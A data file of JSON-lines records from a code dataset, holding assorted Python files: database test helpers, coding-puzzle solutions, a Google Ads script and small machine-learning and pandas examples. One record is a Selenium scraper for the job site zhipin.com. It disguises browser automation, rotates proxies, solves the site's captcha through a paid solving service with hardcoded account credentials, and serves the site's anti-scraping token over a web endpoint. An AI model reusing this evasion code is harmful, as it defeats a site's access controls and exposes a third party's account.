+{"seq_id":"1222442371","text":"from __future__ import annotations\n\nimport os\nfrom typing import (\n Any,\n Callable,\n NamedTuple,\n Optional,\n Sequence,\n Type,\n)\n\nimport shortuuid\nimport sqlalchemy as sa\nfrom sqlalchemy.types import TypeEngine\nimport ydb\n\nfrom dl_db_testing.database.engine_wrapper import EngineWrapperBase\n\n\nclass YdbTypeSpec(NamedTuple):\n type: ydb.PrimitiveType\n to_sql_str: Callable[[Any], str]\n\n\nSA_TYPE_TO_YDB_TYPE: dict[Type[TypeEngine], YdbTypeSpec] = {\n sa.SmallInteger: YdbTypeSpec(type=ydb.PrimitiveType.Uint8, to_sql_str=str),\n sa.Integer: YdbTypeSpec(type=ydb.PrimitiveType.Int32, to_sql_str=str),\n sa.BigInteger: YdbTypeSpec(type=ydb.PrimitiveType.Int64, to_sql_str=str),\n sa.Float: YdbTypeSpec(type=ydb.PrimitiveType.Double, to_sql_str=str),\n sa.Boolean: YdbTypeSpec(type=ydb.PrimitiveType.Bool, to_sql_str=lambda x: str(bool(x))),\n sa.String: YdbTypeSpec(type=ydb.PrimitiveType.String, to_sql_str=lambda x: f'\"{x}\"'),\n sa.Unicode: YdbTypeSpec(type=ydb.PrimitiveType.Utf8, to_sql_str=lambda x: f'\"{x}\"'),\n sa.Date: YdbTypeSpec(type=ydb.PrimitiveType.Date, to_sql_str=lambda x: f'DateTime::MakeDate($date_parse(\"{x}\"))'),\n sa.DateTime: YdbTypeSpec(\n ydb.PrimitiveType.Datetime, to_sql_str=lambda x: f'DateTime::MakeDatetime($datetime_parse(\"{x}\"))'\n ),\n sa.TIMESTAMP: YdbTypeSpec(\n ydb.PrimitiveType.Timestamp, to_sql_str=lambda x: f'DateTime::MakeTimestamp($datetime_parse(\"{x}\"))'\n ),\n}\n\n\nclass YQLEngineWrapper(EngineWrapperBase):\n URL_PREFIX = \"yql\"\n\n def get_conn_credentials(self, full: bool = False) -> dict:\n return dict(\n endpoint=self.engine.url.query[\"endpoint\"],\n db_name=self.engine.url.query[\"database\"],\n )\n\n def get_version(self) -> Optional[str]:\n return None\n\n def _generate_table_description(self, columns: Sequence[sa.Column]) -> ydb.TableDescription:\n table = ydb.TableDescription().with_columns(\n *[ydb.Column(col.name, ydb.OptionalType(SA_TYPE_TO_YDB_TYPE[type(col.type)].type)) for col in columns]\n )\n primary_keys = [col.name for col in columns if False] # if primary_key] # FIXME\n if not primary_keys:\n primary_keys = [columns[0].name]\n return table.with_primary_keys(*primary_keys)\n\n def _get_table_path(self, table: sa.Table) -> str:\n return os.path.join(self.engine.url.query[\"database\"], table.name)\n\n def _get_connection_params(self) -> ydb.DriverConfig:\n return ydb.DriverConfig(\n endpoint=self.engine.url.query[\"endpoint\"],\n database=self.engine.url.query[\"database\"],\n )\n\n def table_from_columns(\n self,\n columns: Sequence[sa.Column],\n *,\n schema: Optional[str] = None,\n table_name: Optional[str] = None,\n ) -> sa.Table:\n table_name = table_name or f\"test_table_{shortuuid.uuid()[:10]}\"\n table = sa.Table(table_name, sa.MetaData(), *columns, schema=schema)\n return table\n\n def create_table(self, table: sa.Table) -> None:\n table_description = self._generate_table_description(table.columns)\n table_path = self._get_table_path(table)\n connection_params = self._get_connection_params()\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n session.create_table(table_path, table_description)\n driver.stop(timeout=5)\n\n def insert_into_table(self, table: sa.Table, data: Sequence[dict]) -> None:\n connection_params = ydb.DriverConfig(\n endpoint=self.engine.url.query[\"endpoint\"],\n database=self.engine.url.query[\"database\"],\n )\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n\n table_path = self._get_table_path(table)\n\n upsert_query_prefix = f\"\"\"\n $date_parse = DateTime::Parse(\"%Y-%m-%d\");\n $datetime_parse = DateTime::Parse(\"%Y-%m-%d %H:%M:%S\");\n UPSERT INTO `{table_path}` ({\", \".join([column.name for column in table.columns])}) VALUES\n \"\"\"\n upserts = (\n \"({})\".format(\n \", \".join(\n [\n (\n \"NULL\"\n if data[column.name] is None\n else SA_TYPE_TO_YDB_TYPE[type(column.type)].to_sql_str(data[column.name])\n )\n for column in table.columns\n ]\n )\n )\n for data in data\n )\n session.transaction().execute(upsert_query_prefix + \",\\n\".join(upserts) + \";\", commit_tx=True)\n driver.stop(timeout=5)\n\n def drop_table(self, db_name: str, table: sa.Table) -> None:\n connection_params = self._get_connection_params()\n driver = ydb.Driver(connection_params)\n driver.wait(timeout=5)\n session = driver.table_client.session().create()\n table_path = self._get_table_path(table)\n\n try:\n session.drop_table(table_path)\n except ydb.issues.SchemeError as err:\n if \"does not exist\" in str(err):\n pass # Table does not exist\n else:\n raise\n\n driver.stop(timeout=5)\n","repo_name":"datalens-tech/datalens-backend","sub_path":"lib/dl_connector_ydb/dl_connector_ydb/db_testing/engine_wrapper.py","file_name":"engine_wrapper.py","file_ext":"py","file_size_in_byte":5354,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"26807508433","text":"from django.conf.urls import url\r\nfrom basic_app import views\r\n\r\n# Cuando se usa Template Tagging creamos un espacio de nombres\r\napp_name = 'basic_app'\r\n\r\nurlpatterns = [\r\n url('relative/', views.relative, name='relative'),\r\n url('other/', views.other, name='other')\r\n]\r\n","repo_name":"Daxter98/django-deployment-example","sub_path":"git_base/learning_templates/basic_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74821350242","text":"\ndef main():\n m = 3\n print(find_nb(26825883955641))\nimport math\n\ndef find_nb(m):\n low = math.floor((m ** (1. / 4)) * 1.2) \n high = math.floor((m ** (1. / 3)) / 9) # get the cubed root of m to find an approximate high\n mid = 0\n\n # binary search\n while low <= high:\n mid = (high + low) // 2\n answer = doSummation(mid)\n if answer < m:\n low = mid + 1\n elif answer > m:\n high = mid - 1\n else:\n return mid\n \n \n \n return -1\n\n# return the summation\ndef doSummation(n):\n first_term = n\n second_term = 0\n for i in range(0, n + 1):\n second_term += i * 3\n\n third_term = 0\n for i in range(0, n + 1):\n third_term += pow(i, 2) * 3\n \n fourth_term = 0\n for i in range(0, n + 1):\n fourth_term += pow(i, 3)\n\n # {first_term + 1}n^3 - {second_term}n^2 + {third_term}n - {fourth_term} \n return ((first_term + 1) * pow(n, 3)) - (second_term * pow(n, 2)) + (third_term * n) - fourth_term\n\n\nmain()","repo_name":"jukebox1412/AdventOfCode2021","sub_path":"codewars/Build a pile of Cubes/build old 2.py","file_name":"build old 2.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70309201121","text":"class Solution:\n def findDisappearedNumbers(self, nums: List[int]) -> List[int]:\n \n dictt = set()\n i = 1\n \n while i <= len(nums):\n dictt.add(i)\n i +=1\n\n for i in nums:\n dictt.discard(i)\n \n return dictt\n \n","repo_name":"klparmar/leetcodes","sub_path":"dispNums.py","file_name":"dispNums.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17110400003","text":"from .db import db, environment, SCHEMA, add_prefix_for_prod\nfrom sqlalchemy.sql import func\nfrom sqlalchemy import UniqueConstraint\n\n\nclass Feed(db.Model):\n __tablename__ = \"feeds\"\n\n if environment == \"production\":\n __table_args__ = {\"schema\": SCHEMA}\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(\n db.Integer, db.ForeignKey(add_prefix_for_prod(\"users.id\")), nullable=False\n )\n last_seen = db.Column(\n db.DateTime(timezone=True), server_default=func.now(), onupdate=func.now()\n )\n\n UniqueConstraint(\"user_id\")\n\n user = db.relationship(\"User\", back_populates=\"feed\")\n\n def to_dict(self):\n dct = {\n \"id\": self.id,\n \"user_id\": self.user_id,\n \"last_seen\": self.last_seen\n }\n\n return dct\n","repo_name":"Edward932/mod7-spotifly-clone","sub_path":"app/models/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23564917874","text":"\"\"\" Problem description can be found here:\nhttps://leetcode.com/problems/third-maximum-number/description/\n\"\"\"\n\n\nclass Solution:\n def thirdMax_1(self, nums):\n \"\"\" Returns 3rd maximum unique number in array nums.\n If there's no such, returns 1st / 2nd max unique number.\n Simple algorithm. Algorithm description:\n 1) Create a set of max numbers.\n 2) Loop over array 3 times.\n 3) Choose next max number that doesn't equal numbers in the set.\n 4) If we found 3 max numbers, choose min from the set,\n else choose max number from the set.\n\n Time complexity: O(n). Space complexity: O(1), where n is len(nums).\n \"\"\"\n max_nums = set() # set of 3 or less max numbers from nums\n for k in range(3):\n curr_max = float(\"-inf\") # current maximum number\n for n in nums:\n if n not in max_nums and n > curr_max:\n curr_max = n\n if curr_max != float(\"-inf\"):\n max_nums.add(curr_max)\n return min(max_nums) if len(max_nums) == 3 else max(max_nums)\n\n def thirdMax_2(self, nums):\n \"\"\" Returns 3rd maximum unique number in array nums.\n If there's no such, returns 1st / 2nd max unique number.\n Improved algorithm. Algorithm description:\n 1) Iterate over array once and keep track of 1st, 2nd, 3rd max numbers.\n 2) Return 3rd max number if there's one, else return 1st max number.\n\n Time complexity: O(n). Space complexity: O(1), where n is len(nums).\n \"\"\"\n first = second = third = float(\"-inf\")\n for n in nums:\n if n > first:\n first, second, third = n, first, second\n elif n != first and n > second:\n second, third = n, second\n elif n != first and n != second and n > third:\n third = n\n if third != float(\"-inf\"):\n return third\n else:\n return first\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n assert sol.thirdMax_1([3, 2, 1]) == 1\n assert sol.thirdMax_2([3, 2, 1]) == 1\n assert sol.thirdMax_1([1, 2]) == 2\n assert sol.thirdMax_2([1, 2]) == 2\n","repo_name":"vladn90/Algorithms","sub_path":"Arrays/third_max_number.py","file_name":"third_max_number.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71911716003","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport collections\nfrom googleads import adwords\n\ndef get_traffic(keyword_set):\n\n #Initialize client object.\n adwords_client = adwords.AdWordsClient.LoadFromStorage(os.path.abspath('googleads.yaml'))\n\n #Initialize appropriate service.\n targeting_idea_service = adwords_client.GetService('TargetingIdeaService', version='v201502')\n\n PAGE_SIZE = 100\n offset = 0\n\n #Construct selector object and retrieve related keywords.\n selector = {\n 'searchParameters': [\n {\n 'xsi_type': 'RelatedToQuerySearchParameter',\n 'queries': keyword_set\n },\n {\n 'xsi_type': 'NetworkSearchParameter',\n 'networkSetting': [{'targetSearchNetwork': 'true'}]\n }\n ],\n 'ideaType': 'KEYWORD',\n 'requestType': 'STATS',\n 'requestedAttributeTypes': ['KEYWORD_TEXT', 'SEARCH_VOLUME', 'AVERAGE_CPC', 'COMPETITION', 'TARGETED_MONTHLY_SEARCHES'],\n 'paging': {\n 'startIndex': str(offset),\n 'numberResults': str(PAGE_SIZE)\n }\n }\n\n months = {\n 1: 'January',\n 2: 'February',\n 3: 'March',\n 4: 'April',\n 5: 'May',\n 6: 'June',\n 7: 'July',\n 8: 'August',\n 9: 'September',\n 10: 'October',\n 11: 'November',\n 12: 'December'\n }\n traffic_results = {}\n more_pages = True\n while more_pages:\n page = targeting_idea_service.get(selector)\n\n #Display results.\n if 'entries' in page:\n for result in page['entries']:\n attributes = {}\n traffic_result_set = {}\n for attribute in result['data']:\n attributes[attribute['key']] = getattr(attribute['value'], 'value', '0')\n\n if attributes['SEARCH_VOLUME'] == '0':\n traffic_result_set['average_monthly_search_volume'] = None\n else:\n traffic_result_set['average_monthly_search_volume'] = attributes['SEARCH_VOLUME']\n\n if attributes['AVERAGE_CPC'] == '0':\n traffic_result_set['average_cpc'] = None\n else:\n traffic_result_set['average_cpc'] = round(attributes['AVERAGE_CPC']['microAmount'] / 1000000, 2)\n\n if attributes['COMPETITION'] == '0':\n traffic_result_set['competition'] = None\n else:\n traffic_result_set['competition'] = round(attributes['COMPETITION'], 2)\n\n monthly_search_volumes_set = []\n for entry in attributes['TARGETED_MONTHLY_SEARCHES']:\n if 'count' in entry:\n monthly_search_volumes_set.append(months[entry['month']] + ' ' + str(entry['year']) + ': ' + str(entry['count']))\n traffic_result_set['monthly_search_volumes'] = monthly_search_volumes_set\n\n traffic_results[attributes['KEYWORD_TEXT']] = traffic_result_set\n else:\n print ('No related keywords were found.')\n\n offset += PAGE_SIZE\n selector['paging']['startIndex'] = str(offset)\n more_pages = offset < int(page['totalNumEntries'])\n\n return traffic_results\n","repo_name":"cash2one/SERP-Scraper-SOV-Visualizer","sub_path":"GoogleScraper/adwords.py","file_name":"adwords.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34503953575","text":"# importing the libraries\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport random\n\n# importing the dataset\ndata = pd.read_csv('microchip_data.csv')\ndata=data.sample(frac=1)\ndata=data.reset_index(drop=True)\nY=data.iloc[:,2].values\nX=data.iloc[:,:2].values\n\n# Separate into training and testing data\ntrain_size = int((X.shape[0] * 7) / 10) # 70% train data\nX_train_indices = random.sample(range(0, X.shape[0]), train_size)\n#print(X_train_indices)\nX_train, X_test, Y_train, Y_test = [], [], [], []\nfor i in range(X.shape[0]) :\n if(i in X_train_indices) :\n X_train.append(X[i])\n Y_train.append(Y[i])\n else :\n X_test.append(X[i])\n Y_test.append(Y[i])\n\nX_train = np.array(X_train)\nX_test = np.array(X_test)\nY_train = np.array(Y_train)\nY_test = np.array(Y_test)\n\n#calculation of phi\nphi=sum(Y_train)/len(Y_train)\nprint(\"phi: \"+str(phi))\n\n#calculation of mu0 and mu1\nmu0=[0,0]\nmu1=[0,0]\nc0=0\nc1=0\nfor i in range(len(Y_train)):\n if Y_train[i]==0:\n c0+=1\n mu0+=X_train[i]\n else:\n c1+=1\n mu1+=X_train[i]\n\nmu0/=c0\nmu1/=c1\nprint(\"mu0: \"+str(mu0))\nprint(\"mu1: \"+str(mu1))\n\n#calculation of sigma\nm = len(Y_train)\nsigma = np.zeros((2,2))\nfor i in range(m):\n xi=X_train[i]\n yi=Y_train[i]\n if yi==1:\n tmp=xi-mu1\n tmp=tmp.reshape(-1,1)\n tmp1=np.transpose(tmp)\n sqr=(tmp)*(tmp1)\n sigma = sigma + sqr\nsigma=sigma/m\nprint(\"sigma: \"+str(sigma))\n\ndef calculate_px_y(x,mu):\n n = len(mu)\n det=np.linalg.det(sigma)\n pi = 3.14\n inv=np.linalg.inv(sigma)\n den=pow(2*pi,n/2)*np.sqrt(det)\n tmp=x-mu\n tmp=tmp.reshape(-1,1)\n tmp1=np.transpose(tmp)\n p=np.dot(np.dot(tmp1,inv),tmp)\n p=(-0.5)*p\n num=np.exp(p)\n return num/den\n\n#calculation of P(Y)\ndef calculate_py(y):\n if y==1:\n return phi\n else:\n return (1-phi)\n\n#Predictor function\ndef predictor(x):\n p_0 = calculate_px_y(x,mu0)*calculate_py(0)\n p_1 = calculate_px_y(x,mu1)*calculate_py(1) \n if p_0>p_1:\n return 0\n else:\n return 1\n \ncorrect=0;\npredictions=[]\nl=len(Y_test)\nfor i in range(l):\n x=X_test[i]\n y=Y_test[i]\n y_predicted=predictor(x)\n predictions.append(y_predicted)\n if predictions[i]==y:\n correct+=1\nprint(\"Correct Predictions: \" + str(correct) + \" ,Out of: \"+ str(l))\nprint(\"Accuracy: \",100*correct/l)\n ","repo_name":"saumya-guptaa/ISCO-630E","sub_path":"Assignment 5/GDA.py","file_name":"GDA.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1911440078","text":"# File Excel dengan ekstensi *.xls atau *.xlsx cukup banyak digunakan dalam menyimpan data.\n# Pandas juga memiliki fitur untuk membaca file excel.\n\n# Notes :\n# Dataset : https://dqlab-dataset.s3-ap-southeast-1.amazonaws.com/sample_excel.xlsx\n\n# Fungsi .read_excel() digunakan untuk membaca file excel menjadi dataframe pandas.\n\nimport pandas as pd\n# File xlsx dengan data di sheet \"test\"\ndf_excel = pd.read_excel(\n \"sample_excel.xlsx\", sheet_name=\"test\")\nprint(df_excel.head(4)) # Menampilkan 4 data teratas\n","repo_name":"ryanrizkyf/DQLab","sub_path":"Data Analyst Python Track/5. Data Manipulation with Pandas - Part 1/Dataset_IO/Read_Dataset_Excel.py","file_name":"Read_Dataset_Excel.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3908794660","text":"N = int(input())\nA = list(map(int, input().split()))\n\nA.sort(reverse=True)\n\nscore = 0\ntemp = A[0]+1\nfor i in A:\n if temp-1 != i:\n score += temp\n temp = i\n\n\nprint(score+A[-1])\n","repo_name":"yudai1102jp/atcoder","sub_path":"yukicoder/315/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9172094391","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\nimport threading\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.service import Service as ChromeService\r\nimport requests\r\nfrom flask import Flask, request\r\nfrom selenium import webdriver\r\nfrom datetime import date, datetime\r\nfrom selenium.common.exceptions import JavascriptException, WebDriverException\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\nimport traceback\r\nfrom urllib3.exceptions import MaxRetryError\r\nimport redis\r\nimport pynput\r\nfrom pynput.mouse import Button\r\nfrom hashlib import md5\r\nfrom gevent import pywsgi\r\n\r\napp = Flask(__name__)\r\n\r\nmouse = pynput.mouse.Controller()\r\n\r\n\r\n# 单例模式函数,用来修饰类\r\ndef singleton(cls, *args, **kw):\r\n instances = {}\r\n\r\n def _singleton():\r\n if cls not in instances:\r\n instances[cls] = cls(*args, **kw)\r\n return instances[cls]\r\n\r\n return _singleton\r\n\r\n\r\nclass Chaojiying_Client(object):\r\n\r\n def __init__(self, username, password, soft_id):\r\n self.username = username\r\n password = password.encode('utf8')\r\n self.password = md5(password).hexdigest()\r\n self.soft_id = soft_id\r\n self.base_params = {\r\n 'user': self.username,\r\n 'pass2': self.password,\r\n 'softid': self.soft_id,\r\n }\r\n self.headers = {\r\n 'Connection': 'Keep-Alive',\r\n 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',\r\n }\r\n\r\n def PostPic(self, im, codetype):\r\n \"\"\"\r\n im: 图片字节\r\n codetype: 题目类型 参考 http://www.chaojiying.com/price.html\r\n \"\"\"\r\n params = {\r\n 'codetype': codetype,\r\n }\r\n params.update(self.base_params)\r\n files = {'userfile': ('ccc.jpg', im)}\r\n r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files,\r\n headers=self.headers)\r\n return r.json()\r\n\r\n def PostPic_base64(self, base64_str, codetype):\r\n \"\"\"\r\n im: 图片字节\r\n codetype: 题目类型 参考 http://www.chaojiying.com/price.html\r\n \"\"\"\r\n params = {\r\n 'codetype': codetype,\r\n 'file_base64': base64_str\r\n }\r\n params.update(self.base_params)\r\n r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, headers=self.headers)\r\n return r.json()\r\n\r\n def ReportError(self, im_id):\r\n \"\"\"\r\n im_id:报错题目的图片ID\r\n \"\"\"\r\n params = {\r\n 'id': im_id,\r\n }\r\n params.update(self.base_params)\r\n r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)\r\n return r.json()\r\n\r\n\r\n@singleton\r\nclass Chrome:\r\n def __init__(self):\r\n self.current_city = '101010100'\r\n self.host_url = 'https://www.zhipin.com'\r\n self.start_page = 'https://www.zhipin.com/web/geek/job?city={}'\r\n self.user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'\r\n self.client = redis.Redis('10.86.0.107', decode_responses=True)\r\n self.proxies_key_recode = {}.fromkeys(self.client.keys('proxy_DD*'), 0)\r\n self.is_reload = False\r\n self.chaojiying = Chaojiying_Client('13311860036', 'Welcome2022', '96001')\r\n self.driver = self.init()\r\n self.current_date = date.today()\r\n self.last_change_url_time = datetime.now()\r\n self.token = ''\r\n threading.Thread(target=self.auto_reload, daemon=True).start()\r\n\r\n def auto_reload(self):\r\n while True:\r\n time.sleep(60)\r\n if self.check_error_page():\r\n\r\n self.init()\r\n self.check_search_page()\r\n if date.today() != self.current_date:\r\n self.init()\r\n\r\n def get_proxy(self):\r\n max_val = max(self.proxies_key_recode.values())\r\n if max_val > 10:\r\n min_val = min(self.proxies_key_recode.values())\r\n self.proxies_key_recode = {key: val - min_val for key, val in self.proxies_key_recode.items()}\r\n proxy = sorted(self.proxies_key_recode.items(), key=lambda item: item[1])[0][0]\r\n self.proxies_key_recode[proxy] += 1\r\n return self.client.get(proxy)\r\n\r\n def get_proxy_test(self):\r\n return random.choice(self.client.lrange('use_proxies', 0, -1))\r\n\r\n def check_search_page(self):\r\n try:\r\n WebDriverWait(self.driver, 5).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, 'search-btn')), '找不到元素')\r\n except Exception as e:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n if self.verification_code():\r\n self.driver.get(self.start_page.format(self.current_city))\r\n else:\r\n self.driver.refresh()\r\n time.sleep(20)\r\n\r\n try:\r\n self.driver.find_element(By.CLASS_NAME, 'search-btn')\r\n return True\r\n except Exception as e:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n if self.verification_code():\r\n self.driver.get(self.start_page.format(self.current_city))\r\n else:\r\n self.driver.refresh()\r\n\r\n def init(self):\r\n self.close()\r\n time.sleep(1)\r\n if not getattr(self, 'driver', None):\r\n self.is_reload = False\r\n options = webdriver.ChromeOptions()\r\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\r\n options.add_experimental_option(\"useAutomationExtension\", False)\r\n options.add_argument(\"--disable-blink-features=AutomationControlled\")\r\n\r\n service = ChromeService()\r\n\r\n proxy = self.get_proxy()\r\n # print(proxy)\r\n options.add_argument('--proxy-server=http://' + proxy)\r\n options.add_argument('--user-agent=' + self.user_agent)\r\n\r\n self.driver = webdriver.Chrome(service=service, options=options)\r\n self.driver.maximize_window()\r\n self.driver.set_page_load_timeout(30)\r\n try:\r\n self.driver.get(self.start_page.format(self.current_city))\r\n time.sleep(5)\r\n self.check_search_page()\r\n if self.check_error_page():\r\n return self.init()\r\n\r\n\r\n except Exception as e:\r\n self.close()\r\n print(e)\r\n time.sleep(5)\r\n return self.init()\r\n self.is_reload = True\r\n\r\n return self.driver\r\n\r\n def verification_code(self):\r\n # 获取验证码按钮\r\n validate_button_click = self.driver.find_element(By.CLASS_NAME, 'btn')\r\n\r\n # 点击获取取验证码\r\n validate_button_click.click()\r\n # 等待验证码加载\r\n WebDriverWait(self.driver, 20).until(EC.visibility_of_element_located((By.CLASS_NAME, 'geetest_item_img')),\r\n '元素没有找到')\r\n # 获取验证码\r\n code_element = self.driver.find_element(By.CLASS_NAME, 'geetest_item_wrap')\r\n code_url = re.search('url\\(\"(.*?)\"', code_element.get_attribute('style')).group(1)\r\n headers = {'user-agent': self.user_agent}\r\n image_content = requests.get(code_url, headers=headers,timeout=30).content\r\n with open('code_img.png', 'wb') as f:\r\n f.write(image_content)\r\n # 发送打码平台获取验证码坐标\r\n print(image_content)\r\n # self.driver.quit()\r\n # 移动鼠标点击验证码\r\n img_location = self.driver.find_element(by=By.XPATH, value='//div[@class=\"geetest_item_wrap\"]').location\r\n print(img_location)\r\n mouse.position = img_location.get('x') + 1 - 17, img_location.get('y') + 73 - 17\r\n xx = img_location.get('x') + 1 - 17\r\n yy = img_location.get('y') + 73 - 17\r\n mouse.position = xx, yy\r\n\r\n result = self.chaojiying.PostPic(image_content, 9004)\r\n time.sleep(3)\r\n pos_list = [[int(_) for _ in x.split(',')] for x in result['pic_str'].split('|')]\r\n for i, (pos_x, pos_y) in enumerate(pos_list):\r\n mouse.position = xx + pos_x, yy + pos_y\r\n mouse.click(Button.left)\r\n time.sleep(2)\r\n\r\n # 提交 验证验证码\r\n self.driver.find_element(by=By.XPATH, value='//div[@class=\"geetest_commit_tip\"]').click()\r\n # 访问列表页面\r\n try:\r\n WebDriverWait(self.driver, 15).until(EC.url_changes('https://www.zhipin.com/web/user/safe/verify-slider'),\r\n '验证失败')\r\n except Exception:\r\n self.chaojiying.ReportError(result['pic_id'])\r\n return False\r\n return True\r\n\r\n def check_error_page(self):\r\n try:\r\n if self.driver.current_url == 'https://www.zhipin.com/web/user/safe/verify-slider':\r\n self.verification_code()\r\n\r\n content = self.driver.page_source\r\n if '检查代理服务器' in content or '尝试次数过多' in content or '代理服务器出现问题' in content or '您的 IP 存在异常访问行为' in content:\r\n self.close()\r\n time.sleep(5)\r\n\r\n print('网络连接失败,重新启动浏览器')\r\n return True\r\n except Exception as e:\r\n self.close()\r\n return True\r\n\r\n def get_token(self, seed, ts):\r\n\r\n self.token = self.driver.execute_script(\r\n f'return encodeURIComponent((new document.zhipinFrame[0].contentWindow.ABC).z({repr(seed)}, parseInt({repr(ts)}) + 60 * (480 + (new Date).getTimezoneOffset()) * 1e3))')\r\n\r\n #encodeURIComponent((new document.zhipinFrame[0].contentWindow.ABC).z('lXhb2C9vhqoc6+CKl9o0/BXaEsTpZG0aqsXzreUeuFw=', parseInt('1685974978182')))\r\n return self.token\r\n\r\n def change_url(self):\r\n if (datetime.now() - self.last_change_url_time).seconds >= 60 * 60 * 8:\r\n self.driver.get(self.start_page.format(self.current_city))\r\n self.last_change_url_time = datetime.now()\r\n time.sleep(10)\r\n\r\n def __del__(self):\r\n try:\r\n self.driver.quit()\r\n except:\r\n pass\r\n\r\n def close(self):\r\n try:\r\n self.driver.quit()\r\n self.driver = None\r\n self.is_reload = False\r\n except Exception as e:\r\n\r\n pass\r\n\r\n\r\n@app.route('/getToken')\r\ndef get_encrypt():\r\n params = request.args.to_dict()\r\n seed, ts = params.get('enc').split(',')\r\n city_code = params.get('cityCode')\r\n\r\n try:\r\n if chrome.is_reload:\r\n token = chrome.get_token(seed, ts)\r\n else:\r\n token = chrome.token\r\n time.sleep(10)\r\n return token\r\n except Exception as e:\r\n print(e)\r\n time.sleep(10)\r\n traceback.print_exc()\r\n return chrome.token\r\n\r\n\r\nif __name__ == '__main__':\r\n chrome = Chrome()\r\n time.sleep(10)\r\n app.run('0.0.0.0', port=8888)\r\n # server = pywsgi.WSGIServer(('0.0.0.0', 8888), app)\r\n # server.serve_forever()\r\n # app.run('10.86.0.104', port=8888)\r\n\r\n#geng_xuekai@51helpdesk.com;yan_xingke@51helpdesk.com;wang_zheng@51helpdesk.com","repo_name":"luflyxian/scrapy","sub_path":"国内/boss/boss_selenium_client.py","file_name":"boss_selenium_client.py","file_ext":"py","file_size_in_byte":11680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33793094053","text":"\"\"\" Exercise #2. Python for Engineers.\"\"\"\n\n#########################################\n# Question 1 - do not delete this comment\n#########################################\n\na = 7 # Replace the assignment with a positive integer to test your code.\n# Replace the assignment with other lists to test your code.\nlst = [10, 20, 5, 7]\n\n# Write the rest of the code for question 1 below here.\n\n\ndef first_divisible_by(lst, num):\n for i, val in enumerate(lst):\n if val % num == 0:\n return i\n return -1\n\n\nprint(first_divisible_by(lst, a))\n\n\n# End of code for question 1\n\n#########################################\n# Question 2 - do not delete this comment\n#########################################\nlst2 = ['55555', '55555', '666666', '666666', '333']\n# Replace the assignment with other lists of strings (str) to test your code.\n\n\n# Write the code for question 2 using a for loop below here.\n\ndef get_average_length_for(lst):\n return len(''.join(lst)) / len(lst)\n\n\ndef above_average_using_for(lst):\n average = get_average_length_for(lst)\n counter = 0\n for val in lst:\n if len(val) > average:\n counter += 1\n return counter\n\n\nprint('The number of stringslonger than the average is:',\n above_average_using_for(lst2))\n\n# Write the code for question 2 using a while loop below here.\n\n\ndef get_average_length_while(lst):\n return len(''.join(lst)) / len(lst)\n\n\ndef above_average_using_while(lst):\n average = get_average_length_while(lst)\n counter = 0\n i = 0\n while i < len(lst):\n if len(lst[i]) > average:\n counter += 1\n i += 1\n return counter\n\n\nprint('The number of stringslonger than the average is:',\n above_average_using_while(lst2))\n\n# End of code for question 2\n\n#########################################\n# Question 3 - do not delete this comment\n#########################################\n\n# Replace the assignment with other lists to test your code.\nlst3 = [1, -2, 3, -4, 5]\n\n\n# Write the rest of the code for question 3 below here.\ndef list_multiplication(lst):\n if len(lst) == 0:\n return 0\n if len(lst) == 1:\n return lst[0]\n my_sum = 0\n for i in range(len(lst) - 1):\n my_sum += lst[i] * lst[i + 1]\n return my_sum\n\n\nprint(list_multiplication(lst3))\n\n# End of code for question 3\n\n\n#########################################\n# Question 4 - do not delete this comment\n#########################################\n\n# Replace the assignment with other lists to test your code.\nlst4 = [0, 1, -1, 2, -2, 3, -3, 4, -4, 5, 6, 7, 8, 9, 10, 15]\n\n# Write the rest of the code for question 4 below 